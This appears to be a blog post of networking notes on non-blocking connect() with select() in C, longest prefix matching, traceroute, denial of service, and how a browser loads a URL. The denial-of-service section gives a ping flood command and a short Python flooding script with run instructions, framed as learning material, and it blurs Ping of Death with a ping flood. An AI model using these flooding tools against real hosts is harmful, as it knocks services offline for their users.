Wednesday, 17 May 2017

Networking

Non-blocking connect() in Linux

The select() function examines the file descriptor sets whose addresses are passed in the readfds, writefds, and errorfds parameters to see whether some of their descriptors are ready for reading, are ready for writing, or have an error condition pending, respectively.

- Create the socket using socket().
- Set the file descriptor to non-blocking mode using fcntl(2):
fcntl(fd, F_SETFL, fcntl(fd, F_GETFL) | O_NONBLOCK);

- Call connect() on the socket.
 

On a non-blocking socket, connect() returns immediately while the connection is still being set up. Checking the descriptor for readiness continuously in a tight loop is not a good solution, so we use the select() function call to wait until the FD is ready to use.

/* No loop required */
fd_set write_set;
FD_ZERO(&write_set);
FD_SET(fd, &write_set);
/* Blocks until fd becomes writable, i.e. the connection attempt has finished */
select(fd + 1, NULL, &write_set, NULL, NULL);

File descriptor masks of type fd_set can be initialized and tested with FD_CLR(), FD_ISSET(), FD_SET(), and

FD_SET(fd, fdsetp) shall add the file descriptor fd to the set pointed to by fdsetp. If the file descriptor fd is already in this set, there shall be no effect on the set, nor will an error be returned.
FD_ZERO(fdsetp) shall initialize the descriptor set pointed to by fdsetp to the null set. No error is returned if the set is not empty at the time FD_ZERO() is invoked.
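
The steps above carried through to the end, as an added example that is not code from the original post. connect_nonblock() is a hypothetical helper: it bounds the wait with a timeout, reads SO_ERROR after select() returns (a writable socket only means the attempt finished, not that it succeeded), and refuses descriptors at or above FD_SETSIZE, reporting them as EMFILE by this example's own choice.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper (name and signature are this example's own): returns a
 * connected, still non-blocking fd, or -1 with errno set. */
int connect_nonblock(const char *ip, unsigned short port, int timeout_ms)
{
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(port) };
    int err = EINVAL, n, fd = -1;
    if (inet_pton(AF_INET, ip, &addr.sin_addr) != 1) goto fail;
    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
    /* FD_SET() on a descriptor >= FD_SETSIZE writes outside the fd_set. */
    if (fd >= FD_SETSIZE) { err = EMFILE; goto fail; }
    int flags = fcntl(fd, F_GETFL);
    if (flags < 0 || fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { err = errno; goto fail; }
    if (connect(fd, (struct sockaddr *)&addr, sizeof addr) == 0) return fd;
    if (errno != EINPROGRESS) { err = errno; goto fail; }
    struct timeval tv = { .tv_sec = timeout_ms / 1000, .tv_usec = (timeout_ms % 1000) * 1000 };
    fd_set write_set;
    do {  /* sleep in the kernel instead of spinning; retry only on EINTR */
        FD_ZERO(&write_set);
        FD_SET(fd, &write_set);
        n = select(fd + 1, NULL, &write_set, NULL, &tv);
    } while (n < 0 && errno == EINTR);
    if (n <= 0) { err = (n == 0) ? ETIMEDOUT : errno; goto fail; }
    /* Writable only means the attempt finished; SO_ERROR says how it ended. */
    socklen_t len = sizeof err;
    if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &err, &len) < 0) err = errno;
    if (err == 0) return fd;
fail:
    if (fd >= 0) close(fd);
    errno = err;
    return -1;
}

int main(void)
{
    /* Constructed target: loopback port 9 is normally closed, so this reports an error. */
    int fd = connect_nonblock("127.0.0.1", 9, 2000);
    if (fd < 0) { perror("connect_nonblock"); return 0; }
    puts("connected");
    close(fd);
    return 0;
}
```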



Longest Prefix Matching
All packets in the overlapping range (192.24.12.0 to 192.24.15.255) are forwarded to next hop B, as B has the longer prefix (22 bits).



What is traceroute?
Traceroute is a widely used command-line utility available in almost all operating systems. It shows you the complete route to a destination address. It also shows the time taken (or delays) between intermediate routers. Isn’t it great? Below is an example on the Windows operating system.
tracert

Denial of Service and Prevention

Denial of Service (DoS) is a cyber-attack on an individual computer or website with the intent to deny services to intended users.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them.

 

Following is the command for flooding an IP address with requests:
ping ip_address -t -l 65500
  • “-t” means the data packets should be sent until the program is stopped.
  • “-l 65500” specifies the data load to be sent to the victim.

 

Following is the Python script for performing a denial of service attack:
# Please note that running this code might
# cause your IP to be blocked by the server. The purpose
# of this code is learning only.
import socket, sys, os
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2];
def attack():
    #pid = os.fork()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 80))
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
    s.send("Host: " + sys.argv[1] + "\r\n\r\n");
    s.close()
# Driver code
for i in range(1, 1000):
    attack()

 

The above code can be run as:
python ddos.py target_ip_address apache

 Prevention

  • Firewall – This is the simplest and least effective method. Generally someone writes some Python scripts that try to filter out the bad traffic, or an enterprise will try to use its existing firewalls to block the traffic.

To safeguard against these attacks, you have to apply secure coding, design a strong architecture that can prevent these kinds of attacks, and keep fixing the bugs of your website day to day.

 

What happens when you type a URL in web browser?
A URL may request an HTML page, an image file or any other type of resource.
  1. If the content of the typed URL is in the cache and fresh, then display the content.
  2. Else find the IP address for the domain so that a TCP connection can be set up. The browser does a DNS lookup.
  3. The browser needs to know the IP address for a URL so that it can set up a TCP connection. This is why the browser needs the DNS service. The browser first looks for the URL-IP mapping in the browser cache, then in the OS cache. If all caches are empty, it makes a recursive query to the local DNS server. The local DNS server provides the IP address.
  4. The browser sets up a TCP connection using the three-way handshake.
  5. The browser sends an HTTP request.
  6. The server runs a web server such as Apache or IIS that handles the incoming HTTP request and sends an HTTP response.
  7. The browser receives the HTTP response and renders the content.
